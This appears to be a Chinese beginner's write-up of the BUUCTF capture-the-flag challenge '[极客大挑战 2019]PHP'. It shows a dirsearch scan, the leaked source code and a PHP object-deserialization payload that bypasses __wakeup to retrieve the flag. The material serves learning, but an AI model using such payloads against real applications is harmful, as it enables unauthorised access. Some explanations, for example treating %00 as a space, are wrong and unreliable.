- 1基于spring多Kafka实例配置_配置多个kafka sasl.jaas.config
- 2git bash本地仓库向gitee远程仓库推送项目_git bash push gitee
- 3全球首个“AI程序员”Deven诞生,真的能替代人类程序员吗?_devin能代替开发吗
- 4测试工作3年还在基础岗?可能只是因为你的工作能力差
- 5Offer必备算法24_BFS解决FloodFill_四道力扣题详解(由易到难)
- 6Linux网络编程_06_数据链路层MAC帧协议_linux 数据包mac层处理
- 7学习笔记——在IDEA中如何上传git以及git分支的拉取和提交_idea如何上传到git
- 8Web安全—文件上传(解析)漏洞_文件上传漏洞
- 9史上最全软件测试工程师常见的面试题总结(百度、oppo、中软国际、华为)_测试工程师面试题
- 10探索图像数据中的隐藏信息:语义实体识别和关系抽取的奇妙之旅_paddleocr kie
[极客大挑战 2019]PHP1全网最详细 纯小白也能看懂
赞
踩
今天来做以下buuctf里面的 [极客大挑战 2019]PHP
这道题主要考到了php的反序列化
话不多说开始演示(小白也能看懂哦)
打开链接我们可以看到一只乱动的小猫
他说:每次小猫都会在键盘上乱跳,所以我有一个良好的备份习惯。
这里我们可以获取到在这个网页中还存在着一个备份网站
于是我们用dirsezrch扫一下(这个工具在kali里面)
dirsearch -u http://f3c1575a-0f81-42eb-bc0d-21f70ac635b0.node4.buuoj.cn:81
然后我们发现了一个www.zip文件把他下载下来 (直接在url网址后面拼接就可以)
然后我们得到了5个文件,打开看看
flag不可能存在这么明显的地方,根本不用试
index.php
- <?php
- include 'class.php';
- $select = $_GET['select'];
- $res=unserialize(@$select);
- ?>
从这里我们可以知道 传参方式为GET传参
传的值是select
$res=unserialize(@$select); 这段代码的作用是将一个字符串反序列化为一个PHP变量。
class.php
- <?php
- include 'flag.php';
-
-
- error_reporting(0);
-
-
- class Name{
- private $username = 'nonono';
- private $password = 'yesyes';
-
- public function __construct($username,$password){
- $this->username = $username;
- $this->password = $password;
- }
-
- function __wakeup(){
- $this->username = 'guest';
- // __wakeup 在反序列化时,当前属性个数大于实际属性个数时,就会跳过__wakeup()
- 所以我们要将 2 改为 3 或者 比2大的数字
-
- 同时,我们要将口变为 %00 若果不写 在我们复制的时候就会减少 空格
- }
-
- function __destruct(){
- if ($this->password != 100) {
- echo "</br>NO!!!hacker!!!</br>";
- echo "You name is: ";
- echo $this->username;echo "</br>";
- echo "You password is: ";
- echo $this->password;echo "</br>";
- die();
- }
- if ($this->username === 'admin') {
- global $flag;
- echo $flag;
- }else{
- echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
- die();
-
-
- }
- }
- }
- ?>
在这个里面我们可以知道
username=admin
password=100
然后开始编写我们的反序列化代码,构造我们的payload
-
- <?php
-
- class Name{
- private $username = 'admin';
- private $password = '100';
- }
-
- $select = new Name();
- $res = serialize(@$select);
- echo $res
-
- //$select = new Name();
- 这段代码创建了一个名为$select的新对象,该对象是通过调用Name类的构造函数来实例化的
- 1. 创建一个新的对象$select。
- 2. 使用关键字new来实例化对象。
- 3. 实例化对象时调用Name类的构造函数,该构造函数可能包含一些初始化代码或设置对象的初始状态。
-
- 总结:这段代码创建了一个新的Name对象$select,并调用了该对象的构造函数来初始化对象。
-
- ?>
-
- //$res=unserialize(@$select);
- 这段代码的作用是将一个字符串反序列化为一个PHP变量。
-
- 代码的步骤如下:
- 1. @$select 表示选择变量$select的值,如果$select存在则取其值,否则返回空值。
- 2. unserialize() 函数将字符串反序列化为一个PHP变量。
- 3. 将反序列化后的结果赋值给$res变量。
然后我们拿到本地去跑一下,得到了一串东西,这就是反序列化的代码,也是我们需要传参的payload
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}解读一下
O:表示对象 O表示对象,1表示对象名的字符串长度,'a'是对象名,0是对象内属性个数 1
4:代表的是你定义的类 这里是定义了一个名为Name的类 有四个字符串
2是对象内属性的个数
s: 代表的字符串
14:代表的字符串的长度
而我们的Nameusername 只有12个字符,这里的14怎么来的呢?
大家可以理解为Name 和username 是拼接起来的 所以在Name和username这里各有一个空格,所以就是14个字符了
后面的意思都一样了
但是我们拿着这串反序列化代码去执行的时候还是找不到flag
就是我们的空格没有被实体化 这里我们需要把空格写出来
而空格的url编码是%00,下面构造我们的payload
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}然后拿着去url后面去拼接就可以得到我们的flag啦!
至于上面那个2是怎么变成3的
__wakeup 在反序列化时,当前属性个数大于实际属性个数时,就会跳过__wakeup()
所以我们要将 2 改为 3 或者 比2大的数字
同时,我们要将口变为 %00 若果不写 在我们复制的时候就会减少 空格
就是这样啦!到此这道题就接完了。
又什么问题小伙伴及时在品论去留言哦!
或者有不会的题也可以在评论区留言,我会及时给你们出解题思路的!
